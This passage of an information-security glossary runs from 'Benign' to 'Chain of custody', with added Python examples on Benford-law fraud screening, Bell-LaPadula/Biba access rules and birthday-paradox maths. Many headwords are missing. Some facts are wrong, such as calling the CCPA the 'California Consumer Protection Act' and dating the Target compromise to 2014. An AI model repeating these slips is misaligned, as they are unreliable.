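    return sum((counts[d] - n * BENFORD[d]) ** 2 / (n * BENFORD[d]) for d in range(1, 10))


def flag_anomalous_claimants(claims_by_worker: dict, min_claims: int = 100,
                             threshold: float = CHI2_CRIT_8DF_P01) -> dict:
    """Return {worker: statistic} for workers whose claims deviate significantly.

    Small samples are skipped: the test is unreliable with few claims.
    """
    flagged = {}
    for worker, amounts in claims_by_worker.items():
        if len(amounts) < min_claims:
            continue
        stat = chi_square_vs_benford(amounts)
        if stat > threshold:
            flagged[worker] = round(stat, 2)
    return flagged


def constructed_dataset() -> dict:
    """Constructed sample data (not real claims).

    Honest claimants: 300 amounts spread evenly in log-space across three
    decades (10 to ~9,800), which conforms to Benford's law.
    Fabricated claimant: 300 amounts spread evenly between 400 and ~997,
    so leading digits 1-3 never appear at all.
    """
    honest = [round(10 ** (1 + 3 * i / 300), 2) for i in range(300)]
    fabricated = [round(400 + 599 * i / 300, 2) for i in range(300)]
    return {"alice": honest, "bob": list(reversed(honest)), "mallory": fabricated}


if __name__ == "__main__":
    for worker, amounts in constructed_dataset().items():
        print(worker, first_digit_counts(amounts), round(chi_square_vs_benford(amounts), 2))
    print("flagged:", flag_anomalous_claimants(constructed_dataset()))
```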


Harmless or helpful, having beneficial or negligible/neutral intent or consequences.  Cf. malicious.

Best Current Practice

Internet Engineering Task Force’s description of a de facto level of performance, security etc.  Serially-numbered and occasionally updated BCPs are used to document evolving or dynamically changing practices for which static standards are impracticable or inappropriate.  Cf. Business Continuity Plan.

Best evidence

The forensic evidence originally gathered or seized from the scene of a crime and destined to be presented in court (e.g. the defendant’s computer) rather than forensic copies made for forensic investigation purposes (e.g. bit-copies of the computer hard drive).  Evidence is considered ‘best’ if there is none better.  Although forensic copies may sometimes be presented in court for various reasons (e.g. if the best evidence has unfortunately gone missing or degraded in storage), they carry slightly less weight than the best evidence.

Best practice

By convention or common agreement, the ultimate approach.  However, since security controls are often highly context-dependent, so-called best practices may be inappropriate, inadequate or even detrimental in any given situation, hence good practice is the better term.

(Browser Helper Object)

Program that loads and runs automatically when Internet Explorer is launched.  Some BHOs are malicious i.e. malware.

Biba model

Formal model or architecture developed by Kenneth J. Biba in 1975 that applies strict (mandatory) access control rules (usually expressed as ‘no read down, no write up’ – the converse of the Bell–LaPadula model) to maintain data integrity.  Subjects (generally programs or systems) can neither corrupt higher-level objects (generally data) nor be corrupted by lower-level objects or subjects in the hierarchy.
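To make the two rule sets concrete, here is a minimal reference monitor for the Bell-LaPadula and Biba entries above. It is an added example, not code from the glossary; the level names, labels and the ‘analyst’/‘web form’ scenario are constructed for illustration.

```python
"""Mandatory access control decisions under Bell-LaPadula and Biba.

Added example (not from the glossary). Each subject and object carries a
confidentiality label (Bell-LaPadula) and an integrity label (Biba); the
monitor grants an operation only if both models allow it.
"""
from dataclasses import dataclass
from enum import IntEnum


class Level(IntEnum):
    """Ordered levels; constructed names, higher value = more sensitive/trusted."""
    PUBLIC = 0
    INTERNAL = 1
    SECRET = 2
    TOP_SECRET = 3


@dataclass(frozen=True)
class Label:
    conf: Level   # confidentiality clearance (subject) or classification (object)
    integ: Level  # integrity level


def blp_allows(subject: Label, obj: Label, op: str) -> bool:
    """Bell-LaPadula: no read up (simple security), no write down (*-property)."""
    if op == "read":
        return subject.conf >= obj.conf
    if op == "write":
        return subject.conf <= obj.conf
    raise ValueError(f"unknown operation {op!r}")


def biba_allows(subject: Label, obj: Label, op: str) -> bool:
    """Biba: no read down (simple integrity), no write up (*-integrity).

    Reading lower-integrity data could corrupt the subject; writing to a
    higher-integrity object could corrupt that object.
    """
    if op == "read":
        return subject.integ <= obj.integ
    if op == "write":
        return subject.integ >= obj.integ
    raise ValueError(f"unknown operation {op!r}")


def reference_monitor(subject: Label, obj: Label, op: str) -> bool:
    """Combined policy: confidentiality AND integrity rules must both pass."""
    return blp_allows(subject, obj, op) and biba_allows(subject, obj, op)


def demo() -> dict:
    """Constructed scenario: a SECRET-cleared analyst process of SECRET integrity,
    a TOP SECRET report, and untrusted (PUBLIC-integrity) web-form input."""
    analyst = Label(conf=Level.SECRET, integ=Level.SECRET)
    report = Label(conf=Level.TOP_SECRET, integ=Level.SECRET)
    web_input = Label(conf=Level.PUBLIC, integ=Level.PUBLIC)
    return {
        # Denied by BLP: reading up to TOP SECRET.
        "analyst reads report": reference_monitor(analyst, report, "read"),
        # Allowed: BLP permits a blind write up, Biba sees equal integrity.
        "analyst writes report": reference_monitor(analyst, report, "write"),
        # BLP permits reading down, but Biba denies reading low-integrity input.
        "analyst reads web input": reference_monitor(analyst, web_input, "read"),
        # Denied by BLP: writing down to a PUBLIC object would leak SECRET data.
        "analyst writes web input": reference_monitor(analyst, web_input, "write"),
    }


if __name__ == "__main__":
    for request, decision in demo().items():
        print(f"{request:28s} -> {'ALLOW' if decision else 'DENY'}")
```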

Big data

Huge (multi-exabyte), rapidly changing, highly complex data sets that cannot be processed adequately with conventional database applications may require radically different approaches.  Security-related logs in large organisations may approach this scale, where conventional data analyses intended to predict impending security threats can take so long to complete that the incidents may have already happened by the time they are reported.  Term often misused by advertisers with a penchant for hyperbole.  See also UBA, SIEM, IDS/IPS and NTA.

Big Brother

Name of the overbearing authoritarian establishment in George Orwell’s dystopian novel “Nineteen eighty-four”.  Euphemism for mass surveillance.


Hacker term for a program that combines multiple executables within one program.

(Bank Identification Number),
(Issuer Identification Number)

The first six digits of a payment card number identifying the card issuer, hence a cracker or carder revealing several is indicating that he has card numbers for those institutions.

Binding corporate rules

“Personal data protection policies which are adhered to by a controller or processor established on the territory of a Member State for transfers or a set of transfers of personal data to a controller or processor in one or more third countries within a group of undertakings, or group of enterprises engaged in a joint economic activity” (GDPR).


Measurable physical characteristic of a person, such as their fingerprints, DNA profile, iris or retinal pattern, palm print, ear shape, facial shape, voice pattern, vein pattern, signature or cursive writing and typing dynamics, that can be used as a credential to identify and/or authenticate them.  Personal information.

Biometric data

“Personal data resulting from specific technical processing relating to the physical, physiological or behavioural characteristics of a natural person, which allow or confirm the unique identification of that natural person, such as facial images or dactyloscopic data” (GDPR).

(Basic Input/Output System)

Low level firmware used to interact with peripherals such as disks, keyboards and mice, complete self-checks and initiate the operating system boot sequence on a computer.  Normally supplied with the motherboard and stored on a ROM, EPROM, EEPROM or flash memory chip capable of being updated or replaced.  Deprecated in favour of UEFI.

BIOS password

Some BIOS firmware requires the user to enter a password to continue the boot sequence or access a device.  This is meant to stop a casual thief from booting/accessing system resources, files etc. but the control is usually weak and easily defeated or bypassed by a competent hacker or forensics specialist.

Birthday paradox

Term reflecting the counterintuitive fact that, in a random group of at least 23 people, it is ‘likely’ (i.e. the probability is greater than 50%) that two of them celebrate their birthdays on the same day of the year.  Has been used as the basis for a cryptanalytic attack that exploits relationships between two sets of data (e.g. passwords and the corresponding hash values) where a match between any value from one set against any value from the other set is considered significant (i.e. discovering any valid password in an entire password file).  This is far more likely than finding a match to a given value (e.g. finding the password for a particular user ID).  A valid concern if all entries in a fingerprint database are scanned for any cross-matches as opposed to scanning a particular set of prints from a crime scene or suspect against the database.
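An added example (not from the glossary) that works the arithmetic behind this entry: the exact 23-person figure, the approximation used for hash-sized spaces, the sample count at which a collision becomes more likely than not, and the ‘any-against-any’ cross-match between two sets that the entry contrasts with matching a single value. The set sizes used in the checks are constructed.

```python
"""Birthday-paradox calculations for birthdays and for hash/fingerprint matching.

Added example. All functions treat draws as uniform over n equally likely
values (365 days, or 2**bits hash outputs); n and set sizes are inputs.
"""
import math


def collision_probability(k: int, n: int) -> float:
    """Exact P(at least one pair collides) among k draws from n values.

    Multiplies (n-i)/n term by term, so it suits n up to a few million;
    for cryptographic sizes use approx_collision_probability instead.
    """
    if k > n:
        return 1.0                      # pigeonhole: collision is certain
    p_no_collision = 1.0
    for i in range(k):
        p_no_collision *= (n - i) / n
    return 1.0 - p_no_collision


def approx_collision_probability(k: int, n: int) -> float:
    """Standard approximation 1 - exp(-k(k-1)/(2n)); accurate when k << n."""
    return -math.expm1(-k * (k - 1) / (2.0 * n))


def samples_for_half_chance(n: int) -> int:
    """Smallest k such that a collision among k draws is more likely than not."""
    k, p_no_collision = 0, 1.0
    while p_no_collision > 0.5:
        p_no_collision *= (n - k) / n
        k += 1
    return k


def birthday_bound_samples(bits: int) -> float:
    """Approximate draws from a 2**bits space for a 50% collision chance.

    sqrt(2 ln 2) * 2**(bits/2) ~= 1.1774 * 2**(bits/2): why an n-bit hash
    offers only about n/2 bits of collision resistance.
    """
    return math.sqrt(2 * math.log(2)) * 2 ** (bits / 2)


def cross_match_probability(a: int, b: int, n: int) -> float:
    """Approximate P(some value in set A equals some value in set B).

    Sets of sizes a and b drawn from n values, a*b pairs each matching with
    probability 1/n (treated as independent): 1 - (1 - 1/n)**(a*b).
    Computed in log space so it stays accurate for n as large as 2**128.
    """
    return -math.expm1(a * b * math.log1p(-1.0 / n))


def single_match_probability(b: int, n: int) -> float:
    """P(one given value matches some value in a set of size b): 1 - (1 - 1/n)**b."""
    return -math.expm1(b * math.log1p(-1.0 / n))


if __name__ == "__main__":
    print("23 people, 365 days:", round(collision_probability(23, 365), 4))
    print("draws for 50% in 365:", samples_for_half_chance(365))
    print("50% bound for 128-bit hash ~ 2**", round(math.log2(birthday_bound_samples(128)), 2))
    # Any-against-any (1000 vs 1000 in a million-value space) vs one-against-set.
    print("cross-match:", round(cross_match_probability(1000, 1000, 10**6), 3))
    print("single match:", round(single_match_probability(1000, 10**6), 3))
```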


Notional device or network address to which unwanted data/traffic can be sent.  Antivirus analysts sometimes hijack the command-and-control features of malware to send stolen data down a sinkhole instead of going to the criminals behind the scams.  See also blackhole.


One of several species of ransomware in the wild in 2019 that strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.  Targets medium to large organisations, demanding ransoms between ~$50k and ~$1m.

Bitwise image,
bit copy

A bit-by-bit identical image copy of all readable information on a storage medium that includes not only conventional data content but also metadata, alternative streams and the unallocated spaces between data files, past the end of file markers.  Normally used for forensic purposes.  May include remnants of data left behind after files have been incompletely deleted or moved, and perhaps (using special forensic techniques and/or hardware) data from disk sectors marked unreadable by the firmware or disk operating system.

Black bag ops,
black bag operations

Covert activities to penetrate, infiltrate or otherwise physically compromise a target’s premises in order to capture useful intelligence, filling the notional swag bag.  See also black ops.

Black hat

Malicious, self-serving, unethical hacker or cracker.  Cf. grey hat and white hat.


List of email servers believed to be pumping out spam, used as a crude form of spam filtering (‘crude’ in that it tars all users of those servers with the same broad brush).


List of email addresses, email servers (see blackhole), URLs (see bit-bucket), people, apps etc. that management deems unacceptable, banned or barred.  Since the default action for unlisted items is usually to permit their access or use, this control generally fails insecure.  “A list of email senders who have previously sent spam to a user” (NIST SP800-114 rev1).  Cf. whitelist.


Form of coercion or extortion used to force someone into doing something inappropriate, illegal or simply against their will, for example by threatening to reveal some embarrassing corporate or personal secret (perhaps a previous criminal act or sexual proclivity) if they do not comply with the blackmailer’s instructions.  See also sextortion.

Black market,
criminal underground

Unofficial, covert, unregulated and untaxed commercial market for stolen property (both physical and intellectual) plus the knowledge, tools, processes (such as money laundering) and other resources of the criminal fraternity.  See also hacker underground, Darknet and Silk Road.

Black ops

Covert (‘blacked-out’) activities normally run by government-sponsored or state security services to infiltrate, undermine or otherwise compromise an adversary, in a manner that permits them plausibly to deny the existence, knowledge or sponsorship of the operation, typically because it is unethical or illegal.  See also black bag ops.

power cut

Extended interruption to the power feed.  Computers and other electronic systems without alternative power sources such as battery-backup, UPS or standby generators, will of course fail in a blackout, potentially corrupting vital system or data files in the process as well as interrupting services.  See also dip, brownout, surge and spike.


Species of POS memory-scraping malware in the wild.  Used to compromise the US retailer Target in 2014.


Species of malware deceptively marketed as a $40 antivirus and spyware package until the criminal operation behind it was shut down by the FBI in 2014.

Black swan event

Outlier/extreme/rare event which is so unusual that it could not reasonably have been predicted using risk analysis processes and models.  Metaphorical term coined by Nassim Nicholas Taleb, originally in connection with financial management but later applied across other fields.  We humans find it difficult to even contemplate, let alone deal rationally with black swans.  Many of us struggle even to take credible worst case scenarios seriously.


Infamous network worm from 2003.


Name of a talented Swiss cryptographer who invented a brute force attack on PKCS#1 v1.5, used by SSL.  Millions of challenges and responses concerning the validity of the message padding are used to determine the key.

Blended threat,
blended attack

Form of attack that combines methods, for instance using social engineering to dupe a target into unwittingly infecting their system with malware.

Bletchley Park

For most of the 20th Century, this manor house and grounds north of London housed a top-secret UK government communications and cryptography unit.  During World War II, Alan Turing, Tommy Flowers and team designed and built the Colossus computer to decrypt German and Japanese traffic including Enigma.  Now a fascinating museum.


Software that has become ‘bloated’ through the incremental addition of marginally useful functions and features, making it more complex and less secure (more vulnerable) as a consequence.


(a) To prevent something from taking place.  (b) Unit of data, either of a fixed size (so many bits, bytes or characters) or delineated by specific marker sequences, characters etc.  (c) “Unit in which data is stored and retrieved on disk and tape devices” (ISO/IEC 27040).


Distributed data architecture used to establish an auditable, high-integrity record of changes to data by linking each change in a ledger to predecessors in the logical sequence using digital signatures.  Does not rely on a trusted authority.  Commonly applied in cryptocurrencies such as Bitcoin.

Block cypher

Symmetric encryption algorithm that encrypts a block consisting of a defined number of sequential plaintext characters at a time.  Cf. stream cypher.


Embarrassing and often humorous human error.  Variously known as a bailout, balls-up, bloomer, blunder, boner, booboo, boob, botch, bungle, bust-up, clanger, corpsing, gaffe, foul-up, fumble, faux pas, goof-up, howler, mistake, screw‑up, snafu, Spoonerism, wipeout etc.  An accidental integrity failure.


Prefix in the terms that follow, implying the exploitation of Bluetooth connections, with or without the device owner’s authorisation and/or knowledge.


A cluster of Bluetooth driver spoofing vulnerabilities, disclosed in 2017, affecting over five billion Android, Linux and Apple devices.


The covert exploitation of security vulnerabilities in someone’s Bluetooth equipment to bug them, for example by surreptitiously causing a compromised Bluetooth cellphone to call another number and so transmit private conversations in the vicinity of the compromised device.


Sending unsolicited text, audio or video messages (e.g. spam) to a Bluetooth device.  While that may be annoying, it is essentially harmless but Bluejacking may also encompass more sinister Bluesnarfing, Bluespying or Bluebugging attacks that involve hijacking (taking control of) the victim’s device.


Hacking a Bluetooth device, violating the user’s privacy and potentially compromising confidential personal and/or proprietary data such as email or SMS/TXT messages, contact details, diaries, photos/videos etc. stored on the device.


Type of hacker attack that exploits security vulnerabilities on Bluetooth equipment to spy on the user, for example accessing stored GPS data to determine where they have been.

Blue team

The defensive team, tasked with protecting the enterprise (or at least its flags) against mock assaults by outsmarting the red team.  See also purple and white team.


Wireless networking protocol intended for short-range use over a few meters (e.g. to connect a wireless headset to a mobile phone) but often accessible over longer distances, especially with higher-power Bluetooth systems built into some laptops and vehicles, and things.  Early versions of Bluetooth were notoriously insecure but even current versions have issues.  “Wireless technology standard for exchanging data over short distances.  Note: ‘Bluetooth’ is a trademark owned by the Bluetooth SIG.” (ISO/IEC 27033-6).  See also ZigBee.

Bluff ransomware,

Malware that gives the appearance of having encrypted or otherwise blocked access to the users’ data in order to extort a ransom payment out of naïve victims, but in reality is simply displaying the message (which typically warns against further checks by threatening to destroy the data).  A form of scareware, a social engineering incident.

Board of Directors
(the Board)

The most senior level of management within the organisation with overarching accountability for protecting and legitimately exploiting the organisation’s assets on behalf of its owners or other stakeholders.  The Board typically delegates responsibility for corporate governance including information security to Officers such as the Executives, retaining a strategic oversight rôle.

Body cam[era], bodycam

Portable CCTV camera worn on or about a person, recording the activities of people around or interacting with the wearer.  The police are increasingly using body cameras both to record valuable evidence from scenes of crime and to exonerate themselves if accused of excessive violence etc.  Miniature cameras can be used for covert surveillance (i.e. spying) as well as for more mundane activities such as recording extreme sports.  See also dash cam.

Body language

See non-verbal communication.

Boiler room

Fraud involving heavy promotion of over-valued or non-existent stocks and shares by bogus stockbrokers promising big investment returns to naïve investors.


Strong post mounted firmly in the ground, intended to reduce the risk of vehicular attacks on a facility.  A physical security control.

Boot sector virus

Form of malware that infects the boot sector (Master Boot Record) on a disk i.e. that part of the disk which is accessed first by the bootloader (itself stored in firmware) in order to load the operating system and so start up the computer.  This precedes the loading of most security software, including old/basic antivirus programs which execute only after the operating system has started (modern antivirus programs load and execute at the earliest opportunity).


See stresser.


Short for ‘robot’.  (a) Networked computer under the remote control of hackers, often compromised using Trojans.  The owner of the computer usually remains oblivious to the compromise.  Often corralled together in botnets.  Also known as a zombie, as in the ‘living dead’ of Hammer horror fame.  (b) Any autonomous piece of software capable of roaming systems and/or networks, whether for benign (e.g. indexing Web pages for search engines) or malicious (e.g. spyware) purposes.

Bot master, botmaster

Hacker or cracker who commands and controls a botnet.


Networks of bots that are used for hacking/criminal activities such as spamming, identity theft, carrying out DDoS attacks or as launch pads for attacking other systems.  Botnets comprising hundreds or thousands of compromised machines are rented out to hackers on the black market.


Malware used to command and control a bot, for example allowing the bot master to download, install and run a code module for a particular type of network attack.


Emails that are undeliverable for some reason (e.g. addressee unknown) may be returned with an explanatory note (“bounced”) or silently deleted – the former approach helps senders but gives spammers clues about the status of email addresses.


See security guard.


Demarcation between zones, typically where private property abuts public land or someone else’s private property, or private networks abut public networks, or the edge of someone’s personal space.  Alternatively, the values or other parameters that distinguish valid from invalid data.  See also perimeter.


Widely held to have been the first personal computer virus, created in 1986 as a proof-of-concept by two Pakistani geeks who subsequently set up an ISP called Brain Communications.  Spread on floppy disks.  Strictly speaking, it was not a true virus since it did not attach itself to executable programs, and it was pre-dated by viruses on other platforms such as Creeper (DEC PDP-10, 1971), ANIMAL/PERVADE (Univac, 1974) and Elk Cloner (Apple II, 1981).


The set of commonly-held perceptions, values and beliefs in the minds of prospects and customers about an organisation and/or its products (goods and services) e.g. “They are trustworthy and high quality”.  Whereas logos and phrases may be trademarked, inventions patented, designs registered and written/spoken words copyrighted, the intangible component of brands makes them difficult to describe let alone protect, yet brands can be extremely valuable, if vulnerable, corporate information assets.  “Marketing-related intangible asset including, but not limited to, names, terms, signs, symbols, logos and designs, or a combination of these, intended to identify goods, services or entities, or a combination of these, creating distinctive images and associations in the minds of stakeholders, thereby generating economic benefits/values” (ISO 10668).  See also reputation.

[Monetary] Brand value

“Economic value of the brand in transferable monetary units.  Note: The result obtained can be either a single economic value or a range of values” (ISO 10668).


Form of information security incident normally involving deliberate action by someone, as opposed to those with purely accidental causes, for example penetrating a defensive barrier such as a wall or firewall, or actively compromising security in general.

Bribe, bribery

The offered, promised or actual provision and acceptance of illicit financial or other inducements with the expectation of favours in return, such as the opportunity to bid favourably for or enter into a contract, or lenience (‘turning a blind eye’) following a compliance failure.  A form of corruption and malfeasance that, despite being both unethical and illegal, is an integral part of business life in some cultures and industries.

(Permanent Denial of Service)

To damage a device and take it out of service in such a way that it is impossible or uneconomic to recover it, making it ‘as useful as a brick’.  May result from an accident (such as a bug or error when updating flash BIOS, or mechanical damage such as dropping the device in the sea) or a deliberate attack.


Malware that infects things and, if they fail a simple security test, irreparably damages their file systems, thus bricking them.  A vigilante worm.


Reduction in power supply voltage lasting more than just a few micro- or milliseconds, enough to dim incandescent lights (hence the name) and cause the failure of electronic systems having inadequate voltage regulation.  See also dip, surge, spike and blackout.

Browser hijack

Malware attack that changes the user’s normal browser home page or new tab selection to bring up some other inappropriate/unsafe website.

Brute force

(a) Form of cryptanalytic attack in which multiple passwords, PINs or encryption keys are entered in rapid succession in an attempt to guess the correct one by chance, exhausting the key space.  Often involves automated tools such as rainbow tables but may be performed manually against low-entropy PIN codes and weak passwords.  (b) A straightforward attack on physical security, such as ram-raiding, chain-sawing through fences and walls, or threatening/assaulting security guards or receptionists.


British Standard code of practice for pre-employment security screening (background checks and security clearance).

Buffer overflow

Software bug that allows – or fails to prevent – a buffer space in memory being over-filled with excessive amounts of data, such that it overwrites adjacent memory locations.  While this normally results in the program simply crashing, hackers are adept at crafting malicious data in such a way that the overspill is directly executed or points to another memory location where exploit code has also been inserted.  Buffers are used to hold interim values and the results of internal calculations and text operations as well as to hold data input through the keyboard or arriving through the network: internal buffers may also be vulnerable to overflows if unchecked.


(a) Programming fault accidentally inserted into a program by a programmer.  Most bugs are relatively benign but some create vulnerabilities that may lead to security incidents such as a crash or compromise.  See also web bug and flaw.  (b) A covert surveillance device used to snoop surreptitiously on the online activities, conversations etc. of a target, potentially compromising trade secrets or personal information.


TOP SECRET NSA ‘decryption program’ disclosed by whistleblower Ed Snowden.  Part of a global surveillance/SIGINT framework systematically snooping on encrypted traffic including SSL and (some) VPNs.  A similar program in the UK is called Edgehill.


Trespass with intent to steal.

Burp suite, Burp

Network hacking/penetration testing tool for attacking Web applications.  Free and commercial versions.


Class of information asset, business function, process etc. that is vitally important to the organisation’s core purposes, objectives or mission.  The potential severity of information security incidents affecting such assets, the scale and nature of the impacts, implies that realistic threats acting on known vulnerabilities almost certainly qualify as high risks.  See also Tier 1, 2 or 3 and safety-critical.

Business continuity

Term encompassing the resilience, recovery and contingency arrangements and plans used to mitigate the effects of incidents and disasters affecting information processes, IT systems, networks and business processes, supply chains etc.

Business Continuity Management (BCM)

The process of directing, controlling and overseeing the organisation’s approach to business continuity, such as business impact assessment to characterize business-critical processes and identify the supporting systems and resources, plus the production, exercising and maintenance of the business continuity plans etc.

Business Continuity Management System

The management system for business continuity.

Business Continuity Plan, Plans or Planning

A pre-considered preparative approach intended to ensure the continued operation of essential business processes (including essential supporting systems, resources and so forth), despite serious incidents or disasters that might occur, through a suitable combination of controls such as resilience, disaster recovery and contingency arrangements that will minimize the impacts.  Cf. Best Current Practice.

Business directory fraud

Through social engineering, fraudsters manipulate victims into over-paying for entries in business directories, listings or databases that are largely worthless and may not even exist.  Common techniques include persistent cold-calling and spamming, misrepresenting the directories, misleading websites, submitting invoices to ‘renew’ non-existent subscriptions directly to lowly procurement or accounts clerks or personal assistants, innocuous-looking forms using the word ‘insertions’ (meaning paid advertisements) in the small print, inducements such as ‘free offers’ and entries in business awards, and baseless coercive threats from self-styled ‘debt collection agencies’.

Business Email Compromise

See BEC and VEC.

Business Impact Assessment

That part of risk analysis which involves reviewing the potential business impacts of more or less serious information security incidents on critical business processes, in order to determine the associated availability and conceivably other information assurance or security requirements.

Business Resumption (or Recovery) Plan (BRP)

Preparations to enable essential business activities to be recovered or restored following a disaster that has disrupted them, typically by providing business-critical information services from an alternate location.

(Bring Your Own Cloud)

Corporate scheme allowing workers to use certain cloud computing services for business purposes, provided suitable information security controls (such as policies concerning classified information, strong user authentication, data encryption and other access controls) are employed.  Unless blocked by network security controls, cloud apps (such as Google Docs or Office365) and cloud storage (such as Google Drive or Dropbox) may be used by workers to exfiltrate valuable information from the organisation, while malicious cloud apps are a form of malware.

(Bring Your Own Device)

Corporate scheme allowing workers to use their PODs for business purposes, provided suitable information security controls are employed (e.g. policies, MDM, encryption and antivirus software).

(Bring Your Own Thing)

Corporate scheme allowing workers to use their things for business purposes, provided suitable information security controls are employed (e.g. policies, MDM, encryption and antivirus software).

Byzantine fault

A class of system failures with symptoms or characteristics that depend on the observer’s perspective or context.  A faulty system may generate data that differ and perhaps appear normal to some other systems, frustrating the use of simple consensus to spot and react to exceptions.

Byzantine Fault Tolerance (BFT)

System architecture designed to avoid or at least identify and respond appropriately to [some types of] Byzantine fault.

Caesar’s cipher

Cryptographic algorithm originally used by Julius Caesar to encrypt secret messages for soldiers in the Roman colonies.  A simple monoalphabetic substitution cipher, easy to break today but evidently adequate to meet Caesar’s data confidentiality requirements back then.  See also Vigenère’s cipher.

Cain and Abel

Password recovery and hacking tool capable of brute-force and dictionary attacks on a wide variety of password hashes and cryptographic keys, on Windows systems.

Caller ID (identity)

Technical facility to display and store a phone caller’s phone number on the called phone, enabling the recipient to identify the caller, call them back etc.  Unfortunately, the technology is not sufficiently secure to prevent social engineers spoofing their numbers (e.g. so fraudsters appear to be calling from a bank’s number).

(Controller Area Network bus)

Communications standards for microcontrollers (Electronic Control Units) and other electronic devices in vehicles, developed by Bosch.  The primary security requirements in such environments are to ensure data and system integrity and availability.


Costly commercial network security/penetration test tool from IMMUNITY.  Automates hundreds of exploits against known vulnerabilities.


Ability, competence, suitability, capacity and/or willingness to do something successfully.  “Quality of being able to perform a given activity” (ISO 19440:2007).


Capability of an IT system, database, network, generator etc. to deliver the required services, process the requisite number of transactions, store sufficient data etc.  Related to availability and performance.  See also capacity management.

Capacity management

Dynamically aligning the provision of IT systems and services with changing demands, in order to maintain appropriate service levels (availability and performance).

Capture The flag

See CTF.


Bank Trojan in-the-wild, built using Carberp.


Crimeware kit for building Trojans.  As with Zeus, the source code for Carberp was released onto the Internet.


Criminal who steals, counterfeits, trades and/or validates credit card data.


Stealing, counterfeiting, trading or validating credit card data.


Without due care, failing to act sufficiently cautiously under the circumstances.  Less severe than negligent or reckless.


Early Internet surveillance system implemented by the FBI in 1997 as PC software, capable of selectively monitoring the Internet traffic to/from specified users by ‘packet sniffing’ on particular network cables.  Based on even earlier surveillance systems (such as Omnivore).  Renamed DCS1000 to appear less threatening.  Superseded in 2001 by ever more sophisticated and capable remote, distributed surveillance systems.

(Continuous Adaptive Risk and Trust Assessment)

Assurance approach involving security monitoring that is continuous (as opposed to periodic e.g. penetration testing), integrated across all levels (from the hardware platform to the applications) and adaptive (responding to risks in real time e.g. using SOAR).  Concept promoted by Gartner in 2018.

(Cloud Access Security Broker)

Similar to a firewall, the CASB acts as a trusted go-between linking cloud computing users with their Cloud Service Providers, applying security rules to the commands and data passing through.

Cascading failure

Information security incidents adversely affecting something (such as electricity generation) on which something else depends (most electrical and electronic devices in that case) are likely to cause widespread, rolling and longer-lasting disruption as the effects spread, with additional impacts further down the line.  Therefore, incidents which harm critical infrastructure are likely to be magnified by the consequential impacts over an extended timeframe.

Cashing out

Hacker phrase for the process of converting “hot” (stolen) information assets into untraceable cash through various black market trades and money laundering schemes.  See also monetize.

(Cheapest Available Technology/Technique Narrowly Avoiding Prosecution)

Spending the least amount necessary to satisfy the letter of the law, where there is no apparent business advantage in going any further.  A drawback of setting low hurdles in compliance-driven cultures.


Warning or proviso.  “A marking that indicates that the information has special requirements in addition to those indicated by the classification.  The term covers codewords, source codewords, releasability indicators and special-handling caveats” (NZ information Security Manual).


UK financial services industry scheme, based on CREST, to accredit and guide penetration testers in testing banking systems.

(Cloud Controls Matrix)

Generic suite of information security controls applicable to various types of cloud computing services, as defined by the CSA.  Addresses both the service providers’ and consumers’ perspectives.

(California Consumer Protection Act of 2018)

An EU-style privacy law that comes into force in January 2020, imposing obligations on medium to large commercial organisations to ‘implement and maintain reasonable security procedures and practices’ in order to protect personal data (as defined in the Act) and giving Californians the right to opt out of companies selling their personal data.

(Closed Circuit TeleVision)

Private audio-visual surveillance system typically used by security guards to monitor premises, safes/vaults etc. for intruders, thieves and saboteurs, by local councils, public bodies and the police to oversee public places for disorder, crimes and safety issues, and by industrial plant operators to monitor the state of the plant.  Modern CCTV systems typically use high definition digital IP cameras on a network.

(Content Delivery Network)

Essentially a geographically-dispersed commercial Web content caching service that, where possible, delivers content from copies held on Web servers near to the user rather than from the original sources.  Reduces latency, increases download speeds, and can help mitigate the effect of Denial of Service attacks and other incidents.

Cease and desist letter,
demand letter,
infringement notification

A lawyer’s letter formally requiring someone permanently to stop doing something, generally reinforced with an explicit or implicit threat to take legal action against them if they persist. 


One of several species of ransomware in the wild that surreptitiously encrypts victims’ data, coercing them into paying a ransom for the decryption keys.  Evidently does not run on Russian-language computers, hinting at its possible origin.  Available to rent as Ransomware as a Service.  Flawed cryptosystem in the initial version has presumably been replaced in Cerber 2.

(Computer [or Cyber] Emergency Response Team),
(Computer [or Cyber] Incident Response Team)

An IRT that specifically handles IT-related incidents.  Many countries have national CERTs, globally supported and coordinated through the CERT-Coordination Center (CERT/CC) in Carnegie Mellon University’s Software Engineering Institute.


The process by which something is formally evaluated against a set of pre-defined criteria and, if appropriate, confirmed compliant.  “A procedure by which a formal assurance statement is given that a deliverable conforms to a specified standard” (NZ information Security Manual).

Certification Authority

Trusted body that digitally signs and issues digital certificates to authenticated users or systems in a PKI.  “Authority trusted by one or more users to create and assign public-key certificates.  Notes: Optionally, the certification authority can create the users' keys.  The role of the certification authority in this process is to guarantee that the individual granted the unique certificate is, in fact, who he or she claims to be.  Usually, this means that the CA has an arrangement with an institution which provides it with information to confirm an individual's claimed identity.  CAs are a critical component in information security and electronic commerce because they guarantee that the two parties exchanging information are really who they claim to be.” (ISO/IEC 27033-1).  “An official with the authority to assert that a system complies with prescribed controls within a standard” (NZ information Security Manual).

Certification body

Accredited organisation deemed sufficiently independent, competent, diligent and trustworthy to review and certify other organisations’ compliance with specifications or requirements formally defined in applicable standards or regulations such as ISO/IEC 27001.  See also Certification Authority.

Certification documents

Compliance certificates, statements etc.  “Documents indicating that a client's ISMS conforms to specified ISMS standards and any supplementary documentation required under the system” (ISO/IEC 27006).

Certification Practice Statement (CPS)

Policy document formally and explicitly defining a given PKI.

Certification report

“A report generated by a certification body of a Common Criteria scheme that provides a summary of the findings of an evaluation” (NZ information Security Manual).

Certificate Revocation List

A published list of digital certificates that have been revoked by the Certification Authority and are therefore invalid.  PKI systems are supposed to check for, and handle, certificates that have been revoked, for instance if the CA has been compromised meaning that fake certificates are or might be in circulation.


Vulnerability in digital certificate handling by some privileged remote access/systems administration tools on Android, exploited by malware in 2015.

Chain letter

An item of correspondence (originally a postal letter, latterly an electronic message such as an email) that entreats the recipient to pass it on to further recipients.  The content of chain letters varies and, although some are legitimate, most are fraudulently using social engineering techniques to part fools from their valuables (e.g. pyramid schemes).  Apart from consuming network bandwidth, data storage capacity, wasting users’ time and fooling victims, chain letters sometimes gain false respectability as a result of being passed on, and effectively endorsed, by trusted but foolish intermediaries.


Flexible but heavy body armour constructed from interlocking steel rings, guarding against glancing blows.  Supplemented by armour plates, shields and helmets protecting the most vulnerable areas of the body against direct hits and penetration by weapons.

Chain of custody

